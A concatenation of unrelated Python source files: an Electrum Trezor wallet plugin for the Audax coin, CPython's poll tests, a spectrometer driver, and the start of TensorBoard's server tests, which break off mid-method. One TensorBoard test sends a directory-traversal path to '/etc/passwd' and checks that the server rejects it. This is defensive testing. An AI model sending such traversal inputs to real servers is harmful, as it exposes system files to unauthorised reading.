self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Audax"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
test_poll.py
|
# Test case for the os.poll() function
import os
import random
import select
try:
import threading
except ImportError:
threading = None
import time
import unittest
from test.test_support import TESTFN, run_unittest, reap_threads, cpython_only
try:
select.poll
except AttributeError:
raise unittest.SkipTest, "select.poll not defined -- skipping test_poll"
def find_ready_matching(ready, flag):
match = []
for fd, mode in ready:
if mode & flag:
match.append(fd)
return match
class PollTests(unittest.TestCase):
def test_poll1(self):
# Basic functional test of poll object
# Create a bunch of pipe and test that poll works with them.
p = select.poll()
NUM_PIPES = 12
MSG = " This is a test."
MSG_LEN = len(MSG)
readers = []
writers = []
r2w = {}
w2r = {}
for i in range(NUM_PIPES):
rd, wr = os.pipe()
p.register(rd)
p.modify(rd, select.POLLIN)
p.register(wr, select.POLLOUT)
readers.append(rd)
writers.append(wr)
r2w[rd] = wr
w2r[wr] = rd
bufs = []
while writers:
ready = p.poll()
ready_writers = find_ready_matching(ready, select.POLLOUT)
if not ready_writers:
raise RuntimeError, "no pipes ready for writing"
wr = random.choice(ready_writers)
os.write(wr, MSG)
ready = p.poll()
ready_readers = find_ready_matching(ready, select.POLLIN)
if not ready_readers:
raise RuntimeError, "no pipes ready for reading"
rd = random.choice(ready_readers)
buf = os.read(rd, MSG_LEN)
self.assertEqual(len(buf), MSG_LEN)
bufs.append(buf)
os.close(r2w[rd]) ; os.close( rd )
p.unregister( r2w[rd] )
p.unregister( rd )
writers.remove(r2w[rd])
self.assertEqual(bufs, [MSG] * NUM_PIPES)
def poll_unit_tests(self):
# returns NVAL for invalid file descriptor
FD = 42
try:
os.close(FD)
except OSError:
pass
p = select.poll()
p.register(FD)
r = p.poll()
self.assertEqual(r[0], (FD, select.POLLNVAL))
f = open(TESTFN, 'w')
fd = f.fileno()
p = select.poll()
p.register(f)
r = p.poll()
self.assertEqual(r[0][0], fd)
f.close()
r = p.poll()
self.assertEqual(r[0], (fd, select.POLLNVAL))
os.unlink(TESTFN)
# type error for invalid arguments
p = select.poll()
self.assertRaises(TypeError, p.register, p)
self.assertRaises(TypeError, p.unregister, p)
# can't unregister non-existent object
p = select.poll()
self.assertRaises(KeyError, p.unregister, 3)
# Test error cases
pollster = select.poll()
class Nope:
pass
class Almost:
def fileno(self):
return 'fileno'
self.assertRaises(TypeError, pollster.register, Nope(), 0)
self.assertRaises(TypeError, pollster.register, Almost(), 0)
# Another test case for poll(). This is copied from the test case for
# select(), modified to use poll() instead.
def test_poll2(self):
cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
p = os.popen(cmd, 'r')
pollster = select.poll()
pollster.register( p, select.POLLIN )
for tout in (0, 1000, 2000, 4000, 8000, 16000) + (-1,)*10:
fdlist = pollster.poll(tout)
if (fdlist == []):
continue
fd, flags = fdlist[0]
if flags & select.POLLHUP:
line = p.readline()
if line != "":
self.fail('error: pipe seems to be closed, but still returns data')
continue
elif flags & select.POLLIN:
line = p.readline()
if not line:
break
continue
else:
self.fail('Unexpected return value from select.poll: %s' % fdlist)
p.close()
def test_poll3(self):
# test int overflow
pollster = select.poll()
pollster.register(1)
self.assertRaises(OverflowError, pollster.poll, 1L << 64)
x = 2 + 3
if x != 5:
self.fail('Overflow must have occurred')
# Issues #15989, #17919
self.assertRaises(OverflowError, pollster.register, 0, -1)
self.assertRaises(OverflowError, pollster.register, 0, 1 << 64)
self.assertRaises(OverflowError, pollster.modify, 1, -1)
self.assertRaises(OverflowError, pollster.modify, 1, 1 << 64)
@cpython_only
def test_poll_c_limits(self):
from _testcapi import USHRT_MAX, INT_MAX, UINT_MAX
pollster = select.poll()
pollster.register(1)
# Issues #15989, #17919
self.assertRaises(OverflowError, pollster.register, 0, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.modify, 1, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, INT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, UINT_MAX + 1)
@unittest.skipUnless(threading, 'Threading required for this test.')
@reap_threads
def test_threaded_poll(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
rfds = []
for i in range(10):
fd = os.dup(r)
self.addCleanup(os.close, fd)
rfds.append(fd)
pollster = select.poll()
for fd in rfds:
pollster.register(fd, select.POLLIN)
t = threading.Thread(target=pollster.poll)
t.start()
try:
time.sleep(0.5)
# trigger ufds array reallocation
for fd in rfds:
pollster.unregister(fd)
pollster.register(w, select.POLLOUT)
self.assertRaises(RuntimeError, pollster.poll)
finally:
# and make the call to poll() from the thread return
os.write(w, b'spam')
t.join()
def test_main():
run_unittest(PollTests)
if __name__ == '__main__':
test_main()
|
optspec_inst.py
|
# standard libraries
import threading
import numpy
import queue
import logging
from nion.utils import Event
from nion.utils import Observable
from nion.swift.model import HardwareSource
from ..aux_files.config import read_data
class OptSpecDevice(Observable.Observable):
def __init__(self, MANUFACTURER):
self.property_changed_event = Event.Event()
self.property_changed_power_event = Event.Event()
self.communicating_event = Event.Event()
self.busy_event = Event.Event()
self.send_gratings = Event.Event()
self.warn_panel = Event.Event()
self.send_data = Event.Event()
self.warn_panel_over = Event.Event()
self.__queue = queue.Queue()
self.__running = False
self.__successful = False
self.__model = MANUFACTURER
self.__thread = None
def init(self):
if self.__model == 'DEBUG':
from . import spec_vi as optSpec
elif self.__model == 'ATTOLIGHT':
from . import spec_attolight as optSpec
elif self.__model == 'PRINCETON':
from . import spec as optSpec
self.__sendmessage = optSpec.SENDMYMESSAGEFUNC(self.sendMessageFactory())
if self.__model == 'PRINCETON':
set_file = read_data.FileManager('global_settings')
SERIAL_PORT_PRINCETON = set_file.settings["spectrometer"]["COM_PRINCETON"]
self.__Spec = optSpec.OptSpectrometer(self.__sendmessage, SERIAL_PORT_PRINCETON)
else:
self.__Spec = optSpec.OptSpectrometer(self.__sendmessage)
if not self.__Spec.success:
return False
self.__gratings = self.__Spec.gratingNames()
self.send_gratings.fire(self.__gratings)
self.__lpmms = self.__Spec.gratingLPMM()
self.__fl = self.__Spec.get_specFL()
self.__cameraSize = 25.6
self.__cameraPixels = self.__Spec.camera_pixels()
self.__cameraName = self.__Spec.which_camera()
self.__devAngle = self.__Spec.deviation_angle()
self.__eirecamera = HardwareSource.HardwareSourceManager().get_hardware_source_for_hardware_source_id(
self.__cameraName)
return (True and self.__eirecamera is not None)
def upt(self):
self.property_changed_event.fire('wav_f')
self.property_changed_event.fire('grating_f')
self.property_changed_event.fire('entrance_slit_f')
self.property_changed_event.fire('exit_slit_f')
self.property_changed_event.fire('which_slit_f')
self.property_changed_event.fire('lpmm_f')
self.property_changed_event.fire('dispersion_nmmm_f')
self.property_changed_event.fire('pixel_size_f')
self.property_changed_event.fire('dispersion_pixels_f')
self.property_changed_event.fire('fov_f')
self.property_changed_event.fire('camera_size_f')
self.property_changed_event.fire('camera_pixels_f')
self.property_changed_event.fire('focalLength_f')
self.upt_calibs()
if not self.__successful: self.__successful = True
def upt_values(self):
self.property_changed_event.fire('wav_f')
self.property_changed_event.fire('lpmm_f')
self.property_changed_event.fire('dispersion_nmmm_f')
self.property_changed_event.fire('pixel_size_f')
self.property_changed_event.fire('dispersion_pixels_f')
self.property_changed_event.fire('fov_f')
self.property_changed_event.fire('camera_size_f')
self.property_changed_event.fire('camera_pixels_f')
self.property_changed_event.fire('focalLength_f')
self.upt_calibs()
def upt_calibs(self):
if self.__eirecamera.camera.camera_model == 'Newton' or self.__eirecamera.camera.camera_model == 'ProEM+: 1600xx(2)B eXcelon':
self.__eirecamera.camera.calibration = [{"offset": 0, "scale": 1, "units": ""},
{"offset": self.__wl - self.dispersion_f * self.__cameraSize / 2.,
"scale": self.dispersion_f * self.__cameraSize / self.__cameraPixels,
"units": "nm"}]
else:
logging.info('***OPT SPECT***: Camera not configured in upt_calibs.')
# elif self.__eirecamera.camera.camera_model == 'ProEM+: 1600xx(2)B eXcelon':
# if self.__eirecamera.camera.sizey == 1:
# self.__eirecamera.camera.calibration = [{"offset": self.__wl - self.dispersion_f * self.__cameraSize / 2.,
# "scale": self.dispersion_f * self.__cameraSize / self.__cameraPixels,
# "units": "nm"}]
# else:
# self.__eirecamera.camera.calibration = [{"offset": 0, "scale": 1, "units": ""},
# {"offset": self.__wl - self.dispersion_f * self.__cameraSize / 2.,
# "scale": self.dispersion_f * self.__cameraSize / self.__cameraPixels,
# "units": "nm"}]
def measure(self):
self.__running = True
self.busy_event.fire('')
self.warn_panel.fire()
self.__thread = threading.Thread(target=self.measureThread)
self.__thread.start()
def measureThread(self):
index = 0
while self.__running:
cam_data = self.__eirecamera.grab_next_to_finish()[0]
cam_hor = numpy.sum(cam_data.data, axis=0) if len(cam_data.data.shape) > 1 else cam_data.data
cam_total = numpy.sum(cam_hor)
self.send_data.fire(cam_total, index)
index += 1
if index == 200: index = 0
def abort(self):
try:
if self.__running:
self.__running = False
self.__thread.join()
self.warn_panel_over.fire()
except AttributeError:
#No measure was happening
pass
self.property_changed_event.fire('')
def sendMessageFactory(self):
def sendMessage(message):
if message:
self.__running = False
self.upt_values()
self.property_changed_event.fire('wav_f')
if self.__successful: self.upt_calibs()
return sendMessage
@property
def wav_f(self):
try:
self.__wl = self.__Spec.get_wavelength()
return format(self.__wl, '.3f')
except AttributeError:
return 'None'
@wav_f.setter
def wav_f(self, value):
if self.__wl != float(value) and 0 <= float(value) <= 2500:
self.__wl = float(value)
self.busy_event.fire("")
if not self.__running: threading.Thread(target=self.__Spec.set_wavelength, args=(self.__wl,)).start()
self.__running = True
@property
def grating_f(self):
try:
self.__grating = self.__Spec.get_grating()
return self.__grating
except AttributeError:
return 0
@grating_f.setter
def grating_f(self, value):
if self.__grating != value:
self.__grating = value
self.busy_event.fire("")
if not self.__running: threading.Thread(target=self.__Spec.set_grating, args=(self.__grating,)).start()
self.__running = True
@property
def lpmm_f(self):
try:
return self.__lpmms[self.__grating]
except AttributeError:
return 'None'
@property
def inc_angle_f(self):
try:
return self.dif_angle_f - self.__devAngle
except AttributeError:
return 'None'
@property
def dif_angle_f(self):
'''
This is somewhat complicated. devAngle is a spectrometer property and are simple a
contraint between two slits (central and camera center) and two angles. Incidence
minus diffraction angle is always constant in a given spectrometer. Please see equation
2.4 in diffraction grating handbook by Christopher Palmer. abs2 is the incidence plus
the diffracted angle divided by two.
'''
try:
ab2 = numpy.arcsin((1 / 2. * 1e-6 * self.__wl * self.lpmm_f) / numpy.cos(self.__devAngle / 2.))
return (2 * ab2 + self.__devAngle) / 2.
except AttributeError:
return 'None'
@property
def dispersion_f(self):
'''
Also confusing but just derivate diffraction equation. Note that alpha depends on wavelength
but its derivative is zero because input is fixed. We wanna see difracted beam angle dispersion
and not entrance. See diffraction grating handbook by Christopher Palmer.
This is often called reciprocal linear dispersion. It is measured in nm/mm.
'''
try:
return 1e6 / self.__lpmms[self.__grating] * numpy.cos(self.dif_angle_f) / self.__fl
except AttributeError:
return 'None'
@property
def entrance_slit_f(self):
try:
self.__entrance_slit = self.__Spec.get_entrance()
return self.__entrance_slit
except AttributeError:
return 'None'
@entrance_slit_f.setter
def entrance_slit_f(self, value):
if self.__entrance_slit != float(value) and 0 <= float(value) <= 5000:
self.__entrance_slit = float(value)
self.busy_event.fire("")
if not self.__running: threading.Thread(target=self.__Spec.set_entrance,
args=(self.__entrance_slit,)).start()
self.__running = True
@property
def exit_slit_f(self):
try:
self.__exit_slit = self.__Spec.get_exit()
return self.__exit_slit
except AttributeError:
return 'None'
@exit_slit_f.setter
def exit_slit_f(self, value):
if self.__exit_slit != float(value) and 0 <= float(value) <= 5000:
self.__exit_slit = float(value)
self.busy_event.fire("")
if not self.__running: threading.Thread(target=self.__Spec.set_exit, args=(self.__exit_slit,)).start()
self.__running = True
@property
def which_slit_f(self):
try:
self.__slit_choice = self.__Spec.get_which()
return self.__slit_choice
except AttributeError:
return -1
@which_slit_f.setter
def which_slit_f(self, value):
if self.__slit_choice != value:
self.__slit_choice = value
self.busy_event.fire("")
if not self.__running: threading.Thread(target=self.__Spec.set_which, args=(self.__slit_choice,)).start()
self.__running = True
@property
def camera_size_f(self):
try:
return format(self.__cameraSize, '.1f')
except AttributeError:
return 'None'
@camera_size_f.setter
def camera_size_f(self, value):
self.__cameraSize = float(value)
self.upt_values()
@property
def camera_pixels_f(self):
try:
return format(self.__cameraPixels, '.0f')
except AttributeError:
return 'None'
@camera_pixels_f.setter
def camera_pixels_f(self, value):
self.__cameraPixels = int(value)
self.upt_values()
@property
def focalLength_f(self):
try:
return format(self.__fl, '.0f')
except AttributeError:
return 'None'
@focalLength_f.setter
def focalLength_f(self, value):
self.__fl = int(value)
self.upt_values()
@property
def pixel_size_f(self):
try:
return self.__cameraSize / self.__cameraPixels * 1e3
except AttributeError:
return 'None'
@property
def dispersion_nmmm_f(self):
try:
return format(self.dispersion_f, '.3f')
except ValueError:
return 'None'
except AttributeError:
return 'None'
@property
def dispersion_pixels_f(self):
try:
return format(self.dispersion_f * self.__cameraSize / self.__cameraPixels, '.3f')
except AttributeError:
return 'None'
@property
def fov_f(self):
try:
return format(self.dispersion_f * self.__cameraSize, '.3f')
except AttributeError:
return 'None'
|
application_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for TensorBoard.
These tests start up a full-fledged TensorBoard server.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import gzip
import json
import numbers
import os
import shutil
import socket
import tempfile
import threading
from six import BytesIO
from six.moves import http_client
from six.moves import xrange # pylint: disable=redefined-builtin
from werkzeug import serving
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.platform import test
from tensorflow.python.summary.writer import writer as writer_lib
from tensorflow.tensorboard import tensorboard
from tensorflow.tensorboard.backend import application
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.plugins import base_plugin
class FakePlugin(base_plugin.TBPlugin):
"""A plugin with no functionality."""
def __init__(self, plugin_name, is_active_value, routes_mapping):
"""Constructs a fake plugin.
Args:
plugin_name: The name of this plugin.
is_active_value: Whether the plugin is active.
routes_mapping: A dictionary mapping from route (string URL path) to the
method called when a user issues a request to that route.
"""
self.plugin_name = plugin_name
self._is_active_value = is_active_value
self._routes_mapping = routes_mapping
def get_plugin_apps(self, multiplexer, logdir):
"""Returns a mapping from routes to handlers offered by this plugin.
Args:
multiplexer: The event multiplexer.
logdir: The path to the directory containing logs.
Returns:
A dictionary mapping from routes to handlers offered by this plugin.
"""
return self._routes_mapping
def is_active(self):
"""Returns whether this plugin is active.
Returns:
A boolean. Whether this plugin is active.
"""
return self._is_active_value
class TensorboardServerTest(test.TestCase):
_only_use_meta_graph = False # Server data contains only a GraphDef
# Number of scalar-containing events to make.
_SCALAR_COUNT = 99
def setUp(self):
self.temp_dir = self._GenerateTestData()
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=application.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True)
plugins = [
FakePlugin(plugin_name='foo', is_active_value=True, routes_mapping={}),
FakePlugin(plugin_name='bar', is_active_value=False, routes_mapping={})
]
app = application.TensorBoardWSGIApp(
self.temp_dir, plugins, multiplexer, reload_interval=0)
try:
self._server = serving.BaseWSGIServer('localhost', 0, app)
# 0 to pick an unused port.
except IOError:
# BaseWSGIServer has a preference for IPv4. If that didn't work, try again
# with an explicit IPv6 address.
self._server = serving.BaseWSGIServer('::1', 0, app)
self._server_thread = threading.Thread(target=self._server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
self._connection = http_client.HTTPConnection(
'localhost', self._server.server_address[1])
def tearDown(self):
self._connection.close()
self._server.shutdown()
self._server.server_close()
def _get(self, path, headers=None):
"""Perform a GET request for the given path."""
if headers is None:
headers = {}
self._connection.request('GET', path, None, headers)
return self._connection.getresponse()
def _getJson(self, path):
"""Perform a GET request and decode the result as JSON."""
self._connection.request('GET', path)
response = self._connection.getresponse()
self.assertEqual(response.status, 200)
data = response.read()
if response.getheader('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def testBasicStartup(self):
"""Start the server up and then shut it down immediately."""
pass
def testRequestMainPage(self):
"""Navigate to the main page and verify that it returns a 200."""
response = self._get('/')
self.assertEqual(response.status, 200)
def testRequestNonexistentPage(self):
"""Request a page that doesn't exist; it should 404."""
response = self._get('/asdf')
self.assertEqual(response.status, 404)
def testDirectoryTraversal(self):
"""Attempt a directory traversal attack."""
response = self._get('/..' * 30 + '/etc/passwd')
self.assertEqual(response.status, 400)
def testLogdir(self):
"""Test the format of the data/logdir endpoint."""
parsed_object = self._getJson('/data/logdir')
self.assertEqual(parsed_object, {'logdir': self.temp_dir})
def testPluginsListing(self):
"""Test the format of the data/plugins_listing endpoint."""
parsed_object = self._getJson('/data/plugins_listing')
# Plugin foo is active. Plugin bar is not.
self.assertEqual(parsed_object, {'foo': True, 'bar': False})
def testRuns(self):
"""Test the format of the /data/runs endpoint."""
run_json = self._getJson('/data/runs')
# Don't check the actual timestamp since it's time-dependent.
self.assertTrue(
isinstance(run_json['run1']['firstEventTimestamp'], numbers.Number))
del run_json['run1']['firstEventTimestamp']
self.assertEqual(
run_json,
{
'run1': {
'compressedHistograms': ['histogram'],
'scalars': ['simple_values'],
'histograms': ['histogram'],
'images': ['image'],
'audio': ['audio'],
# if only_use_meta_graph, the graph is from the metagraph
'graph': True,
'meta_graph': self._only_use_meta_graph,
'run_metadata': ['test run'],
'tensors': [],
}
})
def testApplicationPaths_getCached(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/',): # TODO(jart): '/app.js' in open source
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
